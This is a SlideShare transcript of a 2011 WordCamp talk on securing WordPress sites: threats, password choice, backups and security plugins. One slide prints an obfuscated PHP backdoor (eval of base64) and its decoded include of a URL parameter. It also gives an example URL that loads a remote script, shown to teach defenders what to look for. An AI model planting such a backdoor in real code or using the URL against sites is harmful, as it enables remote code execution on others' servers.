• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Securing Your WordPress Website - WordCamp GC 2011

Securing Your WordPress Website - WordCamp GC 2011



Presentation slides from Vladimir Lasky's talk on how to harden your WordPress website against would-be attackers and avoid inadvertently creating security holes. ...

Presentation slides from Vladimir Lasky's talk on how to harden your WordPress website against would-be attackers and avoid inadvertently creating security holes.

Contains various tips and recommendations for off-the-shelf plugins to mitigate common security threats,

Presented on Sunday 6th November at WordCamp Gold Coast 2011.



Total Views
Views on SlideShare
Embed Views



5 Embeds 27

http://eventifier.co 18
http://a0.twimg.com 3
http://lanyrd.com 3
https://si0.twimg.com 2
http://wpexpert.com.au 1



Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
Post Comment
Edit your comment

    Securing Your WordPress Website - WordCamp GC 2011 Securing Your WordPress Website - WordCamp GC 2011 Presentation Transcript

    • Securing Your WordPress Website Vladimir Lasky http://wpexpert.com.au/ WordCamp GC 2011
    • For the Impatient, Lazy and Easily Distracted
      • Rename your admin account
      • Only download plugins and themes hosted on WordPress.org and regularly update them
      • Change your database table prefix from “wp_” to something random using “WordPress Table Rename” plugin
      • Install the plugin “Semisecure Login Reimagined”
    • Does This Describe You?
      • Seldom update your WordPress installation & plugins
      • Seldom backup your WordPress installation & plugins
      • Access your WordPress site over public computers and/or Wi-Fi networks
      • Use the same password on multiple websites
      • Download themes and plugins from third-party sites or file sharing networks
      • Rely on cheap developers found through online freelance websites
      • You may be at risk!
    • How We Achieve Security
      • The only perfect security is to not have a website - Anything else is relative
      • Our goals:
        • Make the attacker pick on a weaker target
        • Avoid creating a security hole ourselves
      • Our plan:
        • To use off-the-shelf WordPress plugins where possible and avoid doing anything to break compatibility with other plugins or complicate day-to-day activities
    • The Three Pillars of Security PREVENTION DETECTION RECOVERY
    • Know Your Enemy
      • Cyber Criminals
      • Cheap Thrill Seekers AKA “Script Kiddies”
      • Business Rivals
      • Disgruntled Employees
      • Ideological Enemies
    • What Do Attackers Want to Achieve?
      • Cheap thrills
      • Material for identity theft
      • Damage reputation of a business
      • Disrupt e-Commerce
      • To create a "Botnet“ – a staging point for attacks against a third party.
      • Obtaining restricted information
      • Black-hat SEO (usually backlink generation)
    • Characterising Security Threats
      • Active/Passive Method
      • The aims of the other party
      • Their knowledge of you
      • Their level of motivation
      • The level of difficulty required
      • What is their alternative option
    • Top Security Threats
      • Brute Force Password Attacks
      • Code Injection Attacks (SQL/PHP and XSS)
      • Denial of Service Attacks
      • Sniffing Network Traffic to Recover Plaintext Passwords and Session Cookies
      • Malicious Code within Themes/Plugins
    • Brute Force Password Attack Example
    • Classic SQL Injection Example
    • Malicious Code Example
      • The following is a line of obfuscated PHP code in a compromised plugin or theme:
        • eval(base64_decode("aWYoaXNzZXQoJF9HRVRbImNtZCJdKSlpbmNsdWRlICRfR0VUWyJjbWQiXTs="));
      • This evaluates as the following PHP statement:
        • if(isset($_GET["cmd"]))include $_GET["cmd"];
      • This allows an attacker to run any PHP script on your site by setting the query parameter ‘cmd’ in the URL:
        • http://www.yoursite.com/index.php?cmd=http://www.somesite.com/somescript.txt
    • Good Habits
      • Only obtain free plugins and themes hosted on WordPress.org.
      • Buy premium plugins/themes from the Author's website, which should have their contact details
      • Update your WordPress installation and plugins regularly
      • When travelling, access the Internet from your own smartphone or notebook computer – not from an Internet Cafe
    • Choosing a Password
      • Twelve characters long as a minimum, but not a dictionary word
      • Common number/letter substitutions are not very useful
      • A good mnemonic technique: come up with a memorable sentence, and use the first letters of each word to form the password e.g.
        • “ Jack and Jill went up the hill to fetch a pale of water” could form a 13-character password “JaJwuthtfapow”
    • Secure Your Backups
      • Most automated backup plugins operate this way:
        • They archive your database and installation files
        • They upload this archive to a remote site using saved authentication details
      • If your site is compromised, these saved authentication details could be used to destroy your saved backups
      • The solution: Automated Remote Backups
    • Automated Remote Backups
      • Instead:
        • Use the backup plugin ONLY to archive your Database and Installation files and place them in a a private folder
        • Configure a remote system to periodically connect to your site via SFTP/FTP and download this backup file.
      • If a hacker compromises your system, they will not be able to destroy your saved backups
      • Good article on implementing this:
        • http://www.makeuseof.com/tag/automated-remote-backup-wordpress/
    • Plugin: Semisecure Login Reimagined
      • Purpose
        • Encrypts passwords without requiring SSL. Instead, it uses JavaScript to encrypt the password
      • Benefits:
        • Simple installation – just activate
        • Eliminates risk of obtaining password by sniffing network traffic
      • Limitations:
        • All other traffic is unencrypted. WordPress session cookie is still vulnerable
    • Plugin: WordPress HTTPS (SSL)
      • Purpose:
        • All traffic between Web Browser and Blog is encrypted
      • Benefits:
        • Eliminates risk of password sniffing and session hijacking
      • Limitations:
        • Requires a web host with a Shared SSL certificate (HostGator, BlueHost).
        • Alternatively, you must obtain a SSL Certificate in the name of your primary Domain and get your web host to install it.
        • Higher CPU Usage on web server
    • Plugin: Theme Authenticity Checker
      • Purpose:
        • Scans your theme files for presence of code that is likely to be malicious
      • Benefit:
        • Rapidly scans theme files without having to look through code manually
      • Limitations:
        • Does not scan plugins
        • Not guaranteed to find all types of malicious code
    • Plugin: WordPress File Monitor Plus
      • Purpose
        • Periodically checks to see if any files have been added, changed or deleted in your WordPress installation
      • Benefit:
        • Will detect many types of PHP injection attacks and other forms of intrusion
      • Limitations:
        • Will generate false alarms. You may specify folders to be excluded, but then there is a risk that those could be compromised unknowingly
        • Small chance that a very well-targeted attack could inactivate or sabotage the plugin before it raises the alarm
    • Plugin: WordPress Firewall 2
      • Purpose
        • Monitors web requests and blocks those that seem suspicious
      • Benefit:
        • Will block majority of SQL and PHP Injection attempts
      • Limitations:
        • Small performance overhead on each request
        • On most aggressive setting, could interfere with some plugins
    • Plugin: Useful 404s
      • Purpose
        • Detects broken links on your website, or broken links on external sites and sends you an email
      • Benefit:
        • As a side effect, it also can detect attempts to compromise your site – namely, where the attacker spoofs the HTTP_REFERER flag and attempts to blindly access plugins or theme files that may not exist
      • Limitations:
        • Lots and lots of false alarms
    • Plugin: Email PHP Errors Plugin
      • Purpose
        • Captures PHP error output and can also generate emails with error reports. Helps detect bugs in plugins, themes or problems with the web host
      • Benefit:
        • As a side effect, may detect some types of PHP injection attempts or other attempts to exploit code vulnerabilities
        • People often overlook their error_logs and let them pile up
      • Limitations:
        • Lots of false alarms
    • Plugin: WP-Ban
      • Purpose
        • Ban users by IP, IP Range, host name, user agent and referrer URL from visiting your site
      • Benefit :
        • Useful for blocking repeat attacks by the same party
        • Able to reduce the impact of denial of service (DOS) attacks
      • Limitations:
        • Need to determine details of specific attacker(s)
        • A wise attacker will change their IP addresses frequently
        • Can block innocent people
    • Conclusion
      • WordPress Codex - Hardening WordPress
        • http://codex.wordpress.org/Hardening_WordPress
        • Various tips for site administrators to improve your site security
      • WordPress Codex – Data Validation
        • http://codex.wordpress.org/Data_Validation
        • A must for developers - describes all the facilities available in WordPress to validate data, preventing your code from being vulnerable to code injection exploits
      • Questions and Comments:
        • http://wpexpert.com.au/contact-us/